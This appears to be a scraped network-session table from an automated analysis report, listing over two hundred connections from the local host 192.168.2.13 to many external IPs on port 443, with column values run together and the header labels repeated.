                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10130192.168.2.134961083.227.121.237443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10131192.168.2.1338458159.11.122.35443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10132192.168.2.134233464.126.152.124443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10133192.168.2.133578231.17.7.86443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10134192.168.2.134649257.16.171.11443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10135192.168.2.1333004192.38.185.147443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10136192.168.2.1336450110.100.110.132443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10137192.168.2.1353284120.75.224.246443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10138192.168.2.1357406111.95.82.106443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10139192.168.2.1340298204.228.7.79443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10140192.168.2.1339856196.80.90.184443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10141192.168.2.1351098155.204.5.43443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10142192.168.2.1341774165.153.159.175443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10143192.168.2.135745096.57.20.185443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10144192.168.2.1354108110.69.86.48443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10145192.168.2.135428445.115.221.200443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10146192.168.2.1334426116.57.40.89443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10147192.168.2.136035231.20.243.21443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10148192.168.2.1344272171.20.201.145443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10149192.168.2.134020640.43.60.153443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10150192.168.2.133503475.100.173.14443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10151192.168.2.135332094.86.31.99443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10152192.168.2.135227889.98.48.15443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10153192.168.2.134884858.239.71.97443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10154192.168.2.1347966192.236.49.228443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10155192.168.2.1354450164.202.26.205443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10156192.168.2.1360616220.22.96.129443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10157192.168.2.1344808147.42.219.60443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10158192.168.2.1342190148.250.156.234443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10159192.168.2.1352950141.141.82.6443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10160192.168.2.1347130102.185.200.57443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10161192.168.2.135468082.60.205.216443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10162192.168.2.1359588173.114.200.134443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10163192.168.2.135162485.243.106.218443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10164192.168.2.1349472119.67.146.148443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10165192.168.2.1354572138.71.145.102443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10166192.168.2.1346778207.245.83.169443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10167192.168.2.136065042.187.147.147443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10168192.168.2.135686634.23.223.6443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10169192.168.2.1342444182.77.177.30443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10170192.168.2.1332930185.15.103.195443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10171192.168.2.134251253.137.95.72443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10172192.168.2.1350654102.115.192.115443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10173192.168.2.1354192137.87.213.214443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10174192.168.2.133353469.2.124.93443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10175192.168.2.1348380140.254.169.136443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10176192.168.2.1357952111.128.60.225443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10177192.168.2.1355034193.78.70.160443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10178192.168.2.1343006163.121.196.119443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10179192.168.2.1344628124.45.14.80443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10180192.168.2.1339998144.235.221.196443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10181192.168.2.133279667.34.201.127443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10182192.168.2.1334432151.191.145.52443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10183192.168.2.134489232.25.63.69443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10184192.168.2.1344928118.198.45.123443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10185192.168.2.133702418.222.178.210443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10186192.168.2.135774237.205.63.95443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10187192.168.2.135247417.3.124.72443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10188192.168.2.134165231.91.44.154443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10189192.168.2.1340922176.85.34.199443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10190192.168.2.135040651.222.69.170443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10191192.168.2.1350200155.126.151.131443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10192192.168.2.134118668.239.122.84443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10193192.168.2.1354632223.129.149.198443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10194192.168.2.133681475.245.194.172443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10195192.168.2.1359692119.122.171.183443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10196192.168.2.134635662.136.65.89443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10197192.168.2.13377725.14.146.155443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10198192.168.2.1349594138.217.206.23443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10199192.168.2.1356638208.163.105.205443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10200192.168.2.134597276.10.149.132443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10201192.168.2.133460261.63.194.35443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10202192.168.2.1357224111.44.121.192443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10203192.168.2.1340618150.183.183.197443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10204192.168.2.1338666148.48.133.74443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10205192.168.2.133898625.163.249.162443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10206192.168.2.1360412174.119.40.44443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10207192.168.2.134134873.73.154.132443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10208192.168.2.1337468108.240.183.245443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10209192.168.2.13339449.212.143.232443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10210192.168.2.1346696166.210.101.149443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10211192.168.2.1343124146.160.213.148443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10212192.168.2.135767085.251.200.207443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10213192.168.2.1338234128.188.155.119443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10214192.168.2.1359168132.220.163.200443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10215192.168.2.135963035.103.254.236443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10216192.168.2.1343290120.241.14.232443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10217192.168.2.1334384199.157.37.179443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10218192.168.2.1343416131.251.165.27443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10219192.168.2.135494282.240.201.193443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10220192.168.2.1355100186.34.9.81443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10221192.168.2.1356078194.30.150.109443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10222192.168.2.135939243.188.237.146443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10223192.168.2.1360514157.34.114.202443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10224192.168.2.1335976220.203.95.234443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10225192.168.2.1353476125.208.118.173443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10226192.168.2.133305636.26.196.155443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10227192.168.2.1334266101.3.225.255443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10228192.168.2.1353240166.70.100.216443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10229192.168.2.135055870.228.219.45443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10230192.168.2.1336880185.159.13.137443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10231192.168.2.134294462.188.92.9443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10232192.168.2.1354116128.189.182.126443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10233192.168.2.135797834.19.25.142443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10234192.168.2.1334738106.240.181.32443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10235192.168.2.1336506192.130.106.77443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10236192.168.2.1355066146.101.65.65443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10237192.168.2.1350260122.157.39.123443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10238192.168.2.1359308111.187.226.216443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10239192.168.2.134200234.212.109.144443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10240192.168.2.1341158205.90.241.213443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10241192.168.2.135019449.118.124.182443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10242192.168.2.134404691.230.78.183443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10243192.168.2.1338374222.70.135.242443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10244192.168.2.133471293.81.202.164443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10245192.168.2.1335778205.247.153.206443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10246192.168.2.1349844148.155.76.26443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10247192.168.2.13355729.71.227.154443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10248192.168.2.1345998222.45.11.242443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10249192.168.2.1346440126.31.26.100443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10250192.168.2.1352450179.209.236.26443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10251192.168.2.1356844199.107.173.68443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10252192.168.2.1337738189.243.211.196443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10253192.168.2.1352704193.91.64.216443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10254192.168.2.134352460.44.210.135443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10255192.168.2.1336798104.28.210.118443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10256192.168.2.1351000203.178.91.138443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10257192.168.2.1335898175.135.116.134443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10258192.168.2.134472697.130.226.251443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10259192.168.2.1345262200.99.205.123443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10260192.168.2.134819681.159.242.30443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10261192.168.2.135972095.103.95.241443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10262192.168.2.1336530135.3.116.159443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10263192.168.2.134202023.112.165.209443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10264192.168.2.133997296.43.142.126443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10265192.168.2.1348700192.211.188.33443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10266192.168.2.136084819.166.29.164443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10267192.168.2.1359196167.49.231.249443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10268192.168.2.134975043.45.136.252443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10269192.168.2.1335292202.152.172.149443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10270192.168.2.134780214.194.18.125443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10271192.168.2.1339950118.41.4.183443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10272192.168.2.134455468.53.99.238443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10273192.168.2.1339562178.239.188.155443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10274192.168.2.1356816144.12.155.60443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10275192.168.2.135835841.106.42.61443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10276192.168.2.133627649.216.253.97443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10277192.168.2.1343228155.132.6.100443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10278192.168.2.135582270.212.80.24443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10279192.168.2.1339352106.65.145.129443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10280192.168.2.1344720122.253.162.71443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10281192.168.2.1342734176.235.72.185443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10282192.168.2.1354990113.101.104.83443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10283192.168.2.133420257.3.44.104443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10284192.168.2.1341144196.29.73.62443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10285192.168.2.134748869.222.74.179443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10286192.168.2.1360762144.228.166.239443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10287192.168.2.134706838.252.224.127443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10288192.168.2.1337702165.189.156.120443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10289192.168.2.1339652203.151.83.122443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10290192.168.2.1334924154.244.61.137443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10291192.168.2.134181249.190.33.26443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10292192.168.2.134693451.89.241.216443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10293192.168.2.1346092124.148.40.212443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10294192.168.2.1344974195.241.10.34443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10295192.168.2.1334066151.252.22.10443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10296192.168.2.134117450.1.242.39443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10297192.168.2.1345158156.238.236.104443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10298192.168.2.1341360216.140.164.254443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10299192.168.2.133832296.6.79.168443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10300192.168.2.134107896.188.74.82443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10301192.168.2.1352810193.203.55.194443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10302192.168.2.1348792197.111.226.137443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10303192.168.2.1339182220.248.144.80443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10304192.168.2.13476888.128.240.41443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10305192.168.2.13538181.236.216.214443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10306192.168.2.1360072197.236.234.146443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10307192.168.2.1334042140.53.193.79443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10308192.168.2.135960839.74.199.113443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10309192.168.2.1348508180.78.140.42443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10310192.168.2.1333784103.53.190.165443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10311192.168.2.1332952146.227.32.186443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10312192.168.2.133463036.221.149.30443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10313192.168.2.1336496210.98.172.222443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10314192.168.2.1334234120.128.21.136443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10315192.168.2.1356922145.206.4.197443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10316192.168.2.1358274222.121.122.162443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10317192.168.2.135320251.41.81.25443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10318192.168.2.1356976126.218.253.66443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10319192.168.2.1347156174.163.180.63443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10320192.168.2.133970063.84.253.85443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10321192.168.2.135531644.143.94.52443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10322192.168.2.134535693.178.32.4443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10323192.168.2.1349102155.186.236.196443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10324192.168.2.1348468121.57.208.219443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10325192.168.2.13492489.143.157.208443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10326192.168.2.1353492107.249.198.46443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10327192.168.2.1339480197.173.151.83443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10328192.168.2.133938488.139.102.46443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10329192.168.2.135112239.3.106.146443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10330192.168.2.135766052.249.31.6443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10331192.168.2.13516841.91.156.103443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10332192.168.2.1357574186.96.225.47443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10333192.168.2.134907449.123.178.183443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10334192.168.2.1337354223.245.253.50443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10335192.168.2.1353522185.44.226.145443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10336192.168.2.1345246101.129.38.28443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10337192.168.2.1334358102.31.189.179443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10338192.168.2.134314484.192.80.190443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10339192.168.2.1356932158.179.125.236443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10340192.168.2.134517483.71.84.235443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10341192.168.2.1353886168.122.0.105443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10342192.168.2.1346794143.253.147.149443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10343192.168.2.135341293.64.193.80443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10344192.168.2.133430489.59.242.33443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10345192.168.2.1343826182.249.97.168443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10346192.168.2.1332828158.190.245.183443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10347192.168.2.1340680212.128.2.0443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10348192.168.2.134838448.189.194.100443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10349192.168.2.13516285.248.58.0443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    10350192.168.2.1343798152.209.225.149443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
